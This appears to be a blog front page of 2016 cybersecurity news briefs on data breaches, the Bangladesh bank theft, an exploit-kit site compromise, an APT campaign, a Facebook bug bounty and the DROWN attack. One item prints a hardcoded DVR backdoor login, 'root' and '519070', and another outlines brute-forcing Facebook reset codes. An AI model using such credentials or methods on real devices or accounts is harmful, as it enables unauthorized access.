Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Cancer-care giant notifies 2.2 M patients of data breach

A US-based cancer-care giant now faces a major data breach. Fort-Myers’ 21st Century Oncology warns its 2.2 million patients of their personal data being accessed by an unauthorized third party.


The Federal Bureau of Investigation (FBI) had notified the company on November 13 of the unauthorized access of its database.

According to the company, names of patients, social security numbers, physician names, diagnosis and treatment data and insurance information have been accessed. In a statement issued, 21st Century Oncology also informed of hiring a leading forensics firm to conduct an investigation. The company however denied the access of any medical records.

"We immediately hired a leading forensics firm to support our investigation, assess our systems and bolster security," the statement said. "In addition to security measures already in place, we have also taken additional steps to enhance internal security protocols to help prevent a similar incident in the future."

Patients have been sent notification letters to advise them of the breach of their data.

The potentially affected have been offered a year of credit monitoring services without charge.

"We also recommend that patients regularly review the explanation of benefits that they receive from their health insurer," the letter to patients states. "If they see services that they did not receive, please contact the insurer immediately."

News of the breach came at the backdrop of 2 recent people relations blows for the company. The company paid a $34.6 million settlement to the federal government to settle a lawsuit that alleged the company performed and billed for a procedure that was not medically necessary.

In December, it paid $19.75 million to settle another lawsuit from a whistleblower action related to claims of inappropriate billing for bladder cancer examinations.
Read more »

Billion dollar bank theft prevented by hacker’s typo

Last month, a group of unknown hackers committed one of the largest bank robberies in history when they stole $80 million as part of a scheme involving the New York Federal Reserve Bank and the Bangladesh central bank, Reuters reported on Thursday (March 10).

The hackers breached bank’s systems of Bangladesh and inundated the Federal Reserve Bank with requests to transfer money out of the Bangladesh bank's accounts to other accounts they set up in the Philippines and one in Sri Lanka belonging to “the Shalika Foundation.”
After four requests they transferred about $81 million from Bangladeshi bank to Philippines but during the fifth time when they had to transfer $20 million to a non-profit organization in Sri Lanka, they misspelled the name of the NGO, ‘Shalika Foundation’. They misspelled the name ‘foundation’ as ‘fandation’ which prompted a routing bank, Deutsche Bank, to seek clarification from the Bangladesh central bank and so transaction was stopped.
The Shalika Foundation, a supposed non-governmental organization, does not appear to exist at all.

International officials are busy working cleaning up the financial mess left by February’s breach. Investigation team, including the cybersecurity company FireEye,  is working on the case.
According to Bangladeshi officials, they have recovered only a fraction of stolen funds and have little hope of apprehending the hackers.

The South Asian country has blamed New York Fed for not stopping the theft in time. Finance Minister, Abul Maal Abdul Muhith has told Reuters that the country may file a lawsuit.

The theft comes a year after a a group of hackers stole $300 million from over 100 banks worldwide. In that case, the hackers used malicious software to monitor activity at each bank via live video feed for months before conducting the theft.
Read more »

'Burrp' compromised to deliver Angler EK's and TeslaCrypt

Burrp, a popular Indian restaurant recommendation site, is now serving its users an inedible dish of a malicious trojan (ransomware) after the site was being compromised.

The visitors of the site were redirected to the Angler exploit kit (EK) which then downloaded TeslaCrypt ransomware to their computers.

Symantec (which notified Burrp of the compromise) claimed that, “The attack appears to be related to a technique described in a recent SANS advisory, as it used the gateway [MALICIOUS SITE].info/megaadvertize.”

Burrp got infected as the attackers injected code into one of the site’s JavaScript files (jquery-form.js). When users tried to create a search using the form they were immediately redirected to the site serving up the Angler EK which then deployed TeslaCrypt on unprotected machines.

According to Symantec, once the EK’s landing page has been decrypted using a key sent to the computer , “it attempts to exploit the Microsoft Windows OLE Remote Code Execution Vulnerability(CVE-2014-6332). If the exploit succeeds, then the TeslaCrypt payload is dropped onto the computer.”

“If the exploit doesn’t work, then the kit drops an .swf file with an exploit for the Adobe Flash Player and AIR Unspecified Integer Overflow Vulnerability (CVE-2015-8651) to download TeslaCrypt onto the computer.”

The Angler Exploit Kit has also been observed delivering exploits for the Microsoft Silverlight Remote Code Execution Vulnerability (CVE-2016-0034).

It was also observed that the malicious url in the Burrp compromise contained the "megaadvertize" string but it has since changed to "hellomylittlepiggy."

Meanwhile, most of the users affected by the compromise are from the United States and India. Burrp has taken cognizance of the issue and is working to resolve it.
Read more »

Korean Energy and Transportation Industries attacked by OnionDog APT

Chinese security researchers from cyber-security vendor, Qihoo 360 have blown the lid on a hacker group, ‘OnionDog’ which has been infiltrating and stealing information from the energy, transportation and other infrastructure industries of Korean-language countries through the Internet.

Big data correlation analysis tracked the hacker group’s first activity to October 2013 and in the next two years it was active between late July and early September.

OnionDog has used an arsenal of Trojans and USB worms for its targets.

The trojan, which only lives on average for about 15 days, was used to exfiltrate data from targeted companies and government agencies while the USB worm was developed as a Stuxnet-like threat which could reach targets that were not connected to the Internet.

OnionDog concentrated its efforts on infrastructure industries in Korean-language countries.

In 2015 this organization mainly attacked harbors, VTS, subways, public transportation and other transportation systems but in its preceding year, it attacked many Korean companies activating in the energy and water supply sectors.

360's Threat Intelligence Center found 96 groups of malicious code but all of it was programmed to self-delete, with no malware variant living more than 29 days.

Researchers also discovered 14 (command and control) C&C domain names and IP related to OnionDog which in 2015 were moved to the Darknet, operating via the Onion City Tor2web technology.

With average life cycle of 15 days, it became more difficult for the victim enterprises to notice and take actions than those active for longer period of time.

OnionDog's attacks were mainly carried out in the form of spear phishing emails which contained Trojan-laced executables that used the icon of popular Korean Word processing software called Hangul.

Later in 2015, the group switched tactics and started leveraging software vulnerabilities in the Hangul editor to download and install their malware automatically.

Similar, Hangul vulnerability seems to have been used by the Lazarus group, the APT suspected to have carried out the infamous Sony hack.


Even if nobody said the Lazarus group was operating from North Korea, all clues pointed toward that conclusion, and all clues point to the same conclusion for OnionDog as well.
Read more »

Turkish hacker pleads guilty to global ATM heist



A Turkish man, who is alleged to have masterminded the theft of $55 million dollars, has pleaded guilty in a US Court.


34 year old Ercan Findikoglu is supposed to have leaded the scheme which withdrew money from cash machines around the world . He is accused of several charges including bank fraud and computer intrusion conspiracy for leading the hacking spree and now, faces more than 57 years in prison.


US prosecutors said hack attacks on three payment processing companies aided the widespread theft. They have called the bank heist as one of the most successful in recent times.


"By hacking into the computer networks of global financial institutions, the defendant and his co-conspirators were able to wreak havoc with the worldwide financial system by simultaneously withdrawing tens of millions of dollars,'' said US attorney Robert Capers in a statement.


Findikoglu and his gang stole customer data and used hacked credentials to change account-holders' daily withdrawal limits. They then used copied cards to withdraw money in a series of cyber attacks between 2010 and 2013.


In an attack in February 2013, the gang of withdrew more than $40 million from 3,000 cash machines in an 11-hour period.


Findikoglu used the aliases "Segate" and "Predator," was extradited in June 2015 from Germany, where he was arrested in December 2013. He will be sentenced on July 12.


Read more »

Facebook paid $15,000 for a security flaw

We know that no website is totally secured from security flaws, but when it comes to one of the most popular social media website then our view changes and make us wonder why not our engineers can make website that is totally protected from hackers.

India-based web application expert Anand Prakash has found a security flaw in Facebook that has left million of users prone to brute force password hacking.

According to the expert company's one can guess infinite number of PINs on beta websites while resetting passwords that lead to the discovery of a simple but powerful security flaw.

"[The vulnerability] gave me full access of another users account by setting a new password. I was able to view messages, his credit/debit cards stored under payment section, personal photos etc. Facebook acknowledged the issue promptly, fixed it and rewarded $15,000 USD considering the severity and impact of the vulnerability," Prakash wrote in a blog post.

Whenever a user forgets their password and click on the forgot password they have two option to reset it by entering a phone number or email address after which Facebook will send through a six-digit verification code.

"I tried to brute the six digit code on www.facebook.com and was blocked after 10-12 invalid attempts," the researcher explained. "Then I looked out for the same issue on beta.facebook.com and mbasic.beta.facebook.com and interestingly 'rate limiting' was missing on the 'forgot password' endpoints."

The researcher attempted to reset password on his own account and was able to successful  in setting a new password and getting logged into the profile. "Brute forcing the "n" successfully allowed me to set new password for any Facebook user," he added.

On 22 February, Prakash reported the bug to Facebook and was patched within 24 hours. On 2 March, Facebook paid  the bug bounty of $15,000 to the researcher  for identifying the flaw.


Read more »
Hacking News
Breaking News Hacking News

27 million Mate1.com account hacked and sold

If you have an account on online dating website Mate1.com then it is very high probability that your account has been hacked.

A hacker has claimed of accessing the account usernames, passwords and email addresses for 27 million people by posting a Hell.

According to the Motherboard Vice, who first reported about the hack said that hacker has hacked over 27 million users account details, and sold them to someone else through a deal brokered on the Hell forum.

The hacker told to Motherboard Vice that he managed to compromise the Mate1.com server, and used command access to look at the MySQL database and then download parts of it.

Further adding he said that the online dating website has lax a security flaw which allow  users to log onto the website  without authenticating  their email-id to complete the sign-up process, which means that  you just have to log onto the website, create your account with an email address that belongs to you or to someone eases.

The hacker reveals that Mate1 does not use any encryption technique to store passwords, so don't worry if you have forgotten your password, it will be sent to the corresponding email in plain text.

It is not clear how much the hacker eventually sold the data for, although he was offering it 
Read more »

Berkeley's Financial System hack might affected 80,000

UC Berkeley's Financial System (BFS) was hacked by unauthorized person or persons in Dec 2015, now the officials had  started sending  alert notices to approximately 80,000 current and former faculty, staff, students and vendors.

There is no evidence with the college that the hackers got hold or accessed, acquired or used any personal information. But still the officials are informing potential  victims so that they can avoid any possible misuse of their information and take advantage of credit protection services the campus is offering free of charge.

UC Berkeley has informed both law enforcement, and FBI about the hack.

The BFS is used for all financial management,  purchasing and most non-salary payments in the campus.  The  potential victims include about 57,000 current and former students; about 18,800 former and current employees, including student workers; and 10,300 vendors who do business with the campus.

“The security and privacy of the personal information provided to the university is of great importance to us,” said Paul Rivers, UC Berkeley’s chief information security officer. “We regret that this occurred and have taken additional measures to better safeguard that information.”

The campus is providing one year of free credit monitoring and identity theft insurance, along with resources to assist everyone who is connected with any kind of financial transaction with UC Berkeley.


Read more »

Apple Is Said to Be Trying to Make It Harder to Hack iPhones


Apple engineers are busy developing security measures that would prevent government officials from breaking into locked iPhones . According to reports, the security upgrade would further secure customers’ information from being accessed by the government.

This step by the company comes after a federal court fight in California in which the Obama administration has won its fight over access to data stored in an iPhone used by one of the terrorists in November's San Bernardino attacks. In this case, the Justice Department is asking Apple to hack its own code.

FBI Director James Comey said that they defend the government’s request to have Apple open the iPhone to them. He added that they are only looking for assistance in this case. 

But, Apple’s CEO Tim Cook, in a letter to its users, wrote that their devices have been created so that even Apple employees cannot access the contents of users' iPhones.


“The U.S. government has asked us for something we simply do not have, and something we consider too dangerous to create,” Cook said in a letter to users.

Meanwhile, experts say that the only way to get a way out in this scenario is to get the Congress involved. “We are in for an arms race unless and until Congress decides to clarify who has what obligations in situations like this,” Benjamin Wittes, a senior fellow at the Brookings Institution, told The Times.

Read more »

Digital video recorders give attackers the upper hand in breaching security codes


Digital video recorders that record footage for surveillance activities are now becoming responsible for compromising security of home and business networks.


(Digital video recorder)

 Around 80000 digital video recorders or DVRs either employ hard coded passwords or don’t use a single one, giving way for the attackers to breach security codes. Recently  46000 DVRs were found open to remote hijacking through a hardcoded firmware username and password. 


Risk-Based Security chief researcher Carsten Eiram says most of the DVRs that records footage from surveillance cameras are operating in the US.


"Based on searches using Shodan.io , there are about 36,000 to 46,000 affected internet-­connected devices," Eiram says. He added that the other countries active in the usage of these cameras are UK, Canada, Mexico, and Argentina.


"While analysing cgiServerbinary, we noticed that the authentication process specifically checked for the username 'root' and password '519070' [which is] the same code found in RscgiServerbinary”, added Eiram.
Researchers have analysed that:
“The main ( ) function of the CGI script calls a function to authenticate the user. Within this function, another function is eventually called to handle the authentication and return the result. The function retrieves the user­-supplied credentials and calls a function to check them. Within this function, part of the code specifically checks if the supplied username is “root” and the password is “519070”. If these credentials are supplied, full access is granted to the web interface.”


The vulnerability was first reported to US-CERT on 9 September. But, the report was acknowledged on 21 December.


It was also found that some DVRs exposed to Shodan didn’t even require passwords and could be hacked to offer hackers a remote root shell that cannot be removed.


Experts say that most devices will be exposed since changing the password is a pain, requiring the DVRs to be connected to a local TV with a user-supplied keyboard.








Read more »
Vulnerability
Featured Information Security News Vulnerability

DROWN attack risks millions of popular websites

An international team of researchers warned that more than 11 million websites and e-mail services protected by the transport layer security protocol are vulnerable to a new, low-cost attack that decrypts sensitive communications in few hours.

The cybersecurity experts from universities in Israel, Germany and the US as well as a member of Google's security team found that more than 81,000 of top one million popular websites are vulnerable.
The researchers said many popular sites - including ones belonging to Samsung, Yahoo and a leading Indian bank - appeared to be vulnerable.

The DROWN attack works against TLS-protected communications that rely on the RSA cryptosystem when the key is exposed even indirectly through short for secure sockets layer version 2 (SSLv2).

The vulnerability allows everyone on the internet to browse the web, use e-mail, shop online and send instant messages without third-parties being able to read the communication.  It allows attackers to break the encryption and read or steal sensitive communications, including passwords, credit card numbers, trade secrets, or financial data. Under some common scenarios, an attacker can also impersonate a secure website and intercept or change the content the user sees.

While many security experts believed the removal of SSLv2 support from browser and e-mail clients prevented abuse of the legacy protocol, some misconfigured TLS implementations still tacitly support the legacy protocol when an end-user computer specifically requests its use.

Websites, mail servers, and other TLS-dependent services are at risk for this attack, and many popular sites are affected.

In practice, older email servers would be more likely to have this problem than the newer computers typically used to power websites.

In addition, because many of the servers vulnerable to Drown were also affected by a separate bug, a successful attack could be carried out using a home computer.

Though a fix has been issued but it will take time for many of the website administrators to protect their systems.

The researchers have released a tool that identifies websites that appear to be vulnerable.

The SSLv2 protocol was weakened because, at the time of its creation, the US government wanted to try to restrict the availability of tough encryption standards to other countries.

It has since eased its export limits, but the effects live on.
Read more »
Subscribe to: Comments (Atom)